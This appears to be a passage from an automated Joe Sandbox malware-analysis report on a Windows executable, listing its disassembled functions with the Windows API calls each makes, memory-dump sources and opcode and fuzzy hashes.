                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID: 0
                                                                          • API String ID: 161812096-4108050209
                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                          Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                          • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                          Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 978794511-0
                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                          Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                          Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                          Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memcmp
                                                                          • String ID: '$\$h
                                                                          • API String ID: 2205784470-1303700344
                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                          Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                          Strings
                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 2441338619-1568723262
                                                                          • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                          • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                          Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID: @COM_EVENTOBJ
                                                                          • API String ID: 327565842-2228938565
                                                                          • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                          • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                          Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                          • String ID: H
                                                                          • API String ID: 3613100350-2852464175
                                                                          • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                          • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                          Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 4174999648-3243417748
                                                                          • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                          • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                          Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                          • String ID:
                                                                          • API String ID: 1291720006-3916222277
                                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                          Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                          • String ID: 0$2
                                                                          • API String ID: 93392585-3793063076
                                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                          Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                          • String ID: crts
                                                                          • API String ID: 586820018-3724388283
                                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                          Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2326526234-1173974218
                                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                          Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
